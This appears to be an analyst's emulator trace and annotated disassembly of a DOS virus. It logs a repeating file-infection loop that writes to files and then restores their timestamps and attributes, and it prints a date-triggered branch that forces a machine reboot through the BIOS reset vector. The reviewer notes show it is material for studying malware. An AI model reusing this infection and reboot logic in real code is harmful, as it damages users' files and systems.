0x12c27: mov ax, 0x5701    ; AX=5701h set file date and time (CX = time, DX = date)
0x12c2a: mov cx, word ptr [bp + 0x418]
0x12c2e: mov dx, word ptr [bp + 0x41a]
0x12c32: int 0x21
0x12c34: mov ah, 0x3e    ; AH=3Eh close file
0x12c36: int 0x21
0x12c38: xor cx, cx
0x12c3a: mov cl, byte ptr [bp + 0x417]    ; CX = zero-extended byte from bp+0x417
0x12c3e: call 0x12c5a    ; callee outside this window; the trace logs 'Get or set file attributes' at PC 12c63 next
0x12c41: ret
; Separate helper: AH=42h move file pointer with offset CX:DX = 0; the origin
; in AL is supplied by the caller.
0x12c42: mov ah, 0x42
0x12c44: xor cx, cx
0x12c46: xor dx, dx
0x12c48: int 0x21
0x12c4a: ret
0x12c4b: mov ah, 0x1a    ; start of the set-DTA helper (AH=1Ah); its int 0x21 is past the end of this window
2018-12-25T11:59:44.531689461Z 64 PC: 12cf9 | Write file or device (Write 675 bytes on handle 5)
2018-12-25T11:59:44.538536082Z 87 PC: 12c34 | Get or set file date and time
2018-12-25T11:59:44.540352767Z 62 PC: 12c38 | Close file
2018-12-25T11:59:44.548122497Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:44.559679191Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:44.562822317Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.569818502Z 63 PC: 12b4d | Read file or device (See above)
2018-12-25T11:59:44.592560002Z 62 PC: 12b51 | Close file (See above)
2018-12-25T11:59:44.595058142Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:44.606481383Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.614935167Z 64 PC: 12c10 | Write file or device (See above)
2018-12-25T11:59:44.618172522Z 66 PC: 12c4a | Move file pointer (See above)
2018-12-25T11:59:44.619858414Z 44 PC: 12c1b | Get time (See above)
2018-12-25T11:59:44.623389105Z 64 PC: 12cf9 | Write file or device (See above)
2018-12-25T11:59:44.632714465Z 87 PC: 12c34 | Get or set file date and time (See above)
2018-12-25T11:59:44.634547549Z 62 PC: 12c38 | Close file (See above)
2018-12-25T11:59:44.644641426Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:44.655739508Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:44.658833921Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.667198093Z 63 PC: 12b4d | Read file or device (See above)
2018-12-25T11:59:44.674449707Z 62 PC: 12b51 | Close file (See above)
2018-12-25T11:59:44.676469821Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:44.688569961Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.696032831Z 64 PC: 12c10 | Write file or device (See above)
2018-12-25T11:59:44.699111158Z 66 PC: 12c4a | Move file pointer (See above)
2018-12-25T11:59:44.700845208Z 44 PC: 12c1b | Get time (See above)
2018-12-25T11:59:44.704711452Z 64 PC: 12cf9 | Write file or device (See above)
2018-12-25T11:59:44.713931817Z 87 PC: 12c34 | Get or set file date and time (See above)
2018-12-25T11:59:44.715613301Z 62 PC: 12c38 | Close file (See above)
2018-12-25T11:59:44.725125374Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:44.736122529Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:44.739119448Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.747178139Z 63 PC: 12b4d | Read file or device (See above)
2018-12-25T11:59:44.754379448Z 62 PC: 12b51 | Close file (See above)
2018-12-25T11:59:44.756381419Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:44.768684687Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.776759071Z 64 PC: 12c10 | Write file or device (See above)
2018-12-25T11:59:44.780344725Z 66 PC: 12c4a | Move file pointer (See above)
2018-12-25T11:59:44.783103341Z 44 PC: 12c1b | Get time (See above)
2018-12-25T11:59:44.786569403Z 64 PC: 12cf9 | Write file or device (See above)
2018-12-25T11:59:44.797201355Z 87 PC: 12c34 | Get or set file date and time (See above)
2018-12-25T11:59:44.799159529Z 62 PC: 12c38 | Close file (See above)
2018-12-25T11:59:44.808442235Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:44.819710947Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:44.8230606Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.831100545Z 63 PC: 12b4d | Read file or device (See above)
2018-12-25T11:59:44.838678572Z 62 PC: 12b51 | Close file (See above)
2018-12-25T11:59:44.840733314Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:44.846778658Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.852451269Z 64 PC: 12c10 | Write file or device (See above)
2018-12-25T11:59:44.855806442Z 66 PC: 12c4a | Move file pointer (See above)
2018-12-25T11:59:44.858105214Z 44 PC: 12c1b | Get time (See above)
2018-12-25T11:59:44.861032581Z 64 PC: 12cf9 | Write file or device (See above)
2018-12-25T11:59:44.872973937Z 87 PC: 12c34 | Get or set file date and time (See above)
2018-12-25T11:59:44.875578019Z 62 PC: 12c38 | Close file (See above)
2018-12-25T11:59:44.877543199Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:44.882371138Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:44.886018871Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.894119034Z 63 PC: 12b4d | Read file or device (See above)
2018-12-25T11:59:44.901785519Z 62 PC: 12b51 | Close file (See above)
2018-12-25T11:59:44.904039286Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:44.915399035Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.9228295Z 64 PC: 12c10 | Write file or device (See above)
2018-12-25T11:59:44.926084402Z 66 PC: 12c4a | Move file pointer (See above)
2018-12-25T11:59:44.928528149Z 44 PC: 12c1b | Get time (See above)
2018-12-25T11:59:44.931564076Z 64 PC: 12cf9 | Write file or device (See above)
2018-12-25T11:59:44.941431741Z 87 PC: 12c34 | Get or set file date and time (See above)
2018-12-25T11:59:44.943863382Z 62 PC: 12c38 | Close file (See above)
2018-12-25T11:59:44.952808445Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:44.964108011Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:44.967435043Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.974697687Z 63 PC: 12b4d | Read file or device (See above)
2018-12-25T11:59:44.98144065Z 62 PC: 12b51 | Close file (See above)
2018-12-25T11:59:44.984400739Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:44.995242476Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:45.002269363Z 64 PC: 12c10 | Write file or device (See above)
2018-12-25T11:59:45.006102098Z 66 PC: 12c4a | Move file pointer (See above)
2018-12-25T11:59:45.008034373Z 44 PC: 12c1b | Get time (See above)
2018-12-25T11:59:45.0113717Z 64 PC: 12cf9 | Write file or device (See above)
2018-12-25T11:59:45.028279615Z 87 PC: 12c34 | Get or set file date and time (See above)
2018-12-25T11:59:45.031097223Z 62 PC: 12c38 | Close file (See above)
2018-12-25T11:59:45.040182762Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:45.051621548Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:45.055542928Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:45.06348726Z 63 PC: 12b4d | Read file or device (See above)
2018-12-25T11:59:45.076325792Z 62 PC: 12b51 | Close file (See above)
2018-12-25T11:59:45.079832357Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:45.083028384Z 59 PC: 12ac0 | Change current directory
; Disassembly window after the INT 21h AH=2Ah (Get date) call logged at PC 12ac6:
; a date check, a reboot branch, and the clean-up path that the logged run follows.
; For AH=2Ah DOS returns AL = day of week (0 = Sunday), DH = month, DL = day.
; In this run the next logged call is Set interrupt vector at PC 12ae9, so the
; reboot branch (0x12acf-0x12ada) was not taken.
; NOTE(review): bp-relative operands look like the sample's data area addressed
; through a base kept in bp; bp is set outside this window -- confirm.
2018-12-25T11:59:45.088009733Z 42 PC: 12ac6 | Get date 0x12ac6: cmp al, 4    ; day of week == 4 (Thursday)?
0x12ac8: jne 0x12ae0    ; other weekday -> clean-up path
; NOTE(review): DH is the month for AH=2Ah and never exceeds 12, so the bound of 14
; below appears never to skip anything; possibly DL (day) was intended -- confirm.
0x12aca: cmp dh, 0xe
0x12acd: ja 0x12ae0
0x12acf: mov ax, 0x40
0x12ad2: mov ds, ax    ; DS = 0040h, the BIOS data area segment
0x12ad4: mov word ptr [0x72], 0    ; 0040:0072 is the BIOS reset flag; a value other than 1234h means cold boot
0x12ada: ljmp 0xffff:0    ; far jump to the reset entry FFFF:0000 -> machine restarts
0x12adf: retf    ; follows an unconditional far jump; presumably unreachable
; AH=25h set interrupt vector, AL=24h: INT 24h is the DOS critical-error handler.
; The trace's label for vector 36, 'Set random record number', is the name of
; DOS function 24h, not of this vector.
0x12ae0: mov ax, 0x2524
; DS:DX = far pointer stored at bp+0x446 -- presumably the handler address saved by
; the Get interrupt vector call at the start of the trace; confirm.
0x12ae3: lds dx, ptr [bp + 0x446]
0x12ae7: int 0x21
0x12ae9: push cs
0x12aea: pop ds    ; DS = CS (the lds above overwrote DS)
; DS:DX -> buffer at bp+0x3c2 -- presumably the directory recorded by
; Get current directory earlier in the trace; confirm.
0x12aeb: lea dx, word ptr [bp + 0x3c2]
0x12aef: mov ah, 0x3b    ; AH=3Bh change current directory
0x12af1: int 0x21
0x12af3: mov dx, 0x80    ; offset 80h is the default DTA in the PSP (assumes CS is the PSP segment)
0x12af6: call 0x12c4b    ; 0x12c4b starts with mov ah, 0x1a (set DTA) in the Get time window on this page
0x12af9: cmp sp, 0x4b50    ; window ends here; the instruction that consumes this compare is not shown
2018-12-25T11:59:45.092764914Z 37 PC: 12ae9 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:59:45.094512562Z 59 PC: 12af3 | Change current directory
2018-12-25T11:59:45.096667702Z 26 PC: 12c4f | Set disk transfer address (See above)